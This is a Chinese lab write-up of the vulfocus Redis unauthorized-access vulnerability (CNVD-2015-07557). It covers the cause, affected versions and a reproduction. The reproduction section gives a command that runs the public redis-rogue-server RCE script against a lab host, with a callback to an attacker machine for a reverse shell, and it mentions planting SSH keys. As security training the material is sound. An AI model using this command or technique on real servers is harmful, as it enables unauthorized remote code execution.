当前位置: 首页 > news >正文

vulfocus漏洞学习——redis 未授权访问 (CNVD-2015-07557)

目录

一、漏洞介绍

二、影响版本

三、漏洞复现

1.使用脚本

四、漏洞原理


一、漏洞介绍

Redis 是一个免费开源的键值存储数据库,数据默认存到内存中,用简单的 C 语言编写,能通过网络访问。该漏洞的成因是:在默认情况下,Redis会绑定到 0.0.0.0:6379,这意味着Redis会直接暴露到公网上,而此时如果又没有设置密码认证,会导致任意用户在可以访问到目标服务器的情况下未授权访问Redis并读取Redis的数据,还可以利用Redis提供的命令将自己的ssh公钥写入目标服务器,从而导致可以直接进行ssh登录目标服务器。

二、影响版本

明确受影响版本 Redis<=5.0.5

但由于是配置不当导致的漏洞,所以高版本如果配置不当也可能导致

三、漏洞复现

1.使用脚本

使用github上一键利用的脚本:GitHub - n0b0dyCN/redis-rogue-server: Redis(<=5.0.5) RCE

python3 redis-rogue-server.py --rhost 192.168.57.143 --rport 40585 --lhost 192.168.57.128 

 这里选择反弹shell,用kali进行监听

成功得到flag

看到还有用写入ssh公钥的,但可能由于我们是docker环境,配置起来稍微要麻烦些,并且尝试了也没有成功。如果是直接部署在虚拟机中的应该会成功。

四、漏洞原理

(1)Redis 默认配置不启用密码认证,且默认监听0.0.0.0:6379,允许任意IP连接。所以我们可以直接通过redis-cli工具无密码连接到redis服务;

(2)同时,Redis提供config等敏感命令,攻击者可以通过这些命令写入恶意文件


相关文章:

  • RabbitMQ-高级
  • 信息化的编程未来发展
  • 数据结构实验10.1:内部排序的基本运算
  • 算法-数对的使用
  • 【数据结构篇】排序1(插入排序与选择排序)
  • Vue百日学习计划Day33-35天详细计划-Gemini版
  • java中如何优雅处理多租户系统的查询?
  • 嵌入式学习的第二十三天-数据结构-树+哈希表+内核链表
  • Linux项目部署全攻略:从环境搭建到前后端部署实战
  • Python实现的在线词典学习工具
  • Axure设计数字乡村可视化大屏:构建乡村数据全景图
  • prisma连接非关系型数据库mongodb并简单使用
  • 【TTS回顾】深度剖析 TTS 合成效果的客观评估与主观评价
  • 【D1,2】 贪心算法刷题
  • 《AI革命重塑未来五年:医疗诊断精准度翻倍、自动驾驶事故锐减90%,全球科技版图加速变革》
  • Go 语言 vs C+Lua(Skynet)游戏服务器方案对比分析
  • 睿抗足球机器人
  • 国产 iPaaS 与国外 iPaaS 产品相比如何?以谷云科技为例
  • Scala与Spark:原理、实践与技术全景详解
  • 服务端安全测试:OWASP ZAP使用
  • 习近平在河南洛阳市考察调研
  • 吴双评《发展法学》|穷国致富的钥匙:制度,还是产业活动?
  • 广东高州发生山体滑坡,造成2人遇难4人送医救治1人失联
  • 北方首场高温将进入鼎盛阶段,江南华南多地需警惕降雨叠加致灾
  • 武康大楼再开发:一栋楼火还不够,要带火街区“朋友圈”
  • 女生“生理期请病假要脱裤子证明”?高校回应:视频经处理后有失真等问题